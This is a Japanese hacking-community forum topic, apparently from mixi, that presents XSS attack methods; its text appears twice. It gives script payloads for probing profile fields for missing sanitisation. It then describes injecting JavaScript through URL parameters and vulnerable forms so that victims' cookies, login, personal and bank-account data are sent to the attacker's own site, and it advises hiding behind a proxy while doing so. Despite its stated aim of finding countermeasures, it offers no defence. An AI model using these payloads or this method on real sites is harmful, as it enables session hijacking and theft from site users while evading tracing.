XSS攻撃方法トップです
注意事項
XSS攻撃方法を公開し、その対処方法を模索する為のトピックです。
荒し、業者の勧誘、出会いを求める行為は禁止です。
荒しとは立てられたトピックに関係ないコメントを幾度に渡り投稿する様な行為の事です。
運営方針
厳密ではありません。
XSS攻撃方法に関すれば自由です。
XSS攻撃とは
悪意のあるサイトから対象サイトに対し、スクリプトコードを混入させる事により、
サイト利用者のクッキー情報を傍受したり、フォーム送信先を書き換えるなどによって、
サイト利用者の入力したログイン情報を盗む。
また、脆弱性のある対象サイトにスクリプトコード(JavaScript若しくはAjax)を混入させる事で、
サイト利用者にウィルスやスパイウェアをインストールさせたり、
サイト利用者のセッション情報を、意図せず悪意のあるサイトに送信する事でハイジャックする事。
攻撃するにあたり
DOM(ドキュメントオブジェクトモデル)と
ターゲットサイトの文書構造と
サニタイジングの有無を理解している事等が最低条件。
(サニタイジングに関しては会員登録して、
以下をプロフィール項目に記述してやれば一発でわかる。)
<script type="text/javascript">
<!--//
window.onload = crasher;
function crasher(){
if (window.opener) {
location.href = window.opener;
} else {
location.href = 'test.html';
}
}
//-->
</script>
もしくは
<script type="text/javascript">
<!--//
window.onload = crasher;
function crasher(){
if (window.opener) {
window.open(window.opener,'','');
} else {
window.open('test.html','','');
}
}
//-->
</script>
もしくは
<script>alert('XSS');</script>
手法
方法としては自サイト(攻撃用サイト)を踏み台にさせ、
ユーザーの相手サイトへの転送時にURLパラメータにJavascriptを埋め込み、
対象サイトのフォーム情報をJavaScriptで書き換える。
また、相手サイト上のサニタイジング脆弱を狙い、Script(JavaScriptやVBScript等)を仕込む。
(後者は相手方サイトに情報が残るので、
会員登録から埋め込みまではプロクシを利用する事を心がける。)
相手が気づかなければScriptのイベントハンドリングで起動させ、
例えば相手型サイトとのやり取りのcookie情報を自サイトに転送させたり、
サニタイジング脆弱でformを埋め込む事で相手のサイトではなく、
自サイトに会員情報や、個人情報、口座情報等を転送させることができる。
方法
近日中にw
注意事項 XSS攻撃方法を公開し、その対処方法を模索する為のトピックです。
荒し、業者の勧誘、出会いを求める行為は禁止です。
荒しとは立てられたトピックに関係ないコメントを幾度に渡り投稿する様な行為の事です。
運営方針 厳密ではありません。
XSS攻撃方法に関すれば自由です。
XSS攻撃とは 悪意のあるサイトから対象サイトに対し、スクリプトコードを混入させる事により、
サイト利用者のクッキー情報を傍受したり、フォーム送信先を書き換えるなどによって、
サイト利用者の入力したログイン情報を盗む。
また、脆弱性のある対象サイトにスクリプトコード(JavaScript若しくはAjax)を混入させる事で、
サイト利用者にウィルスやスパイウェアをインストールさせたり、
サイト利用者のセッション情報を、意図せず悪意のあるサイトに送信する事でハイジャックする事。
攻撃するにあたり DOM(ドキュメントオブジェクトモデル)と
ターゲットサイトの文書構造と
サニタイジングの有無を理解している事等が最低条件。
(サニタイジングに関しては会員登録して、
以下をプロフィール項目に記述してやれば一発でわかる。)
<script type="text/javascript">
<!--//
window.onload = crasher;
function crasher(){
if (window.opener) {
location.href = window.opener;
} else {
location.href = 'test.html';
}
}
//-->
</script>
もしくは
<script type="text/javascript">
<!--//
window.onload = crasher;
function crasher(){
if (window.opener) {
window.open(window.opener,'','');
} else {
window.open('test.html','','');
}
}
//-->
</script>
もしくは
<script>alert('XSS');</script>
手法 方法としては自サイト(攻撃用サイト)を踏み台にさせ、
ユーザーの相手サイトへの転送時にURLパラメータにJavascriptを埋め込み、
対象サイトのフォーム情報をJavaScriptで書き換える。
また、相手サイト上のサニタイジング脆弱を狙い、Script(JavaScriptやVBScript等)を仕込む。
(後者は相手方サイトに情報が残るので、
会員登録から埋め込みまではプロクシを利用する事を心がける。)
相手が気づかなければScriptのイベントハンドリングで起動させ、
例えば相手型サイトとのやり取りのcookie情報を自サイトに転送させたり、
サニタイジング脆弱でformを埋め込む事で相手のサイトではなく、
自サイトに会員情報や、個人情報、口座情報等を転送させることができる。
方法 近日中にw
|
|
|
|
|
|
|
|
日本ハッキング&クラッキング会 更新情報
-
最新のイベント
-
まだ何もありません
-
-
最新のアンケート
-
まだ何もありません
-
日本ハッキング&クラッキング会のメンバーはこんなコミュニティにも参加しています
人気コミュニティランキング
- 1位
- 牧場物語 for mixi
- 39304人
- 2位
- 一行で笑わせろ!
- 82527人
- 3位
- 暮らしを楽しむ
- 75438人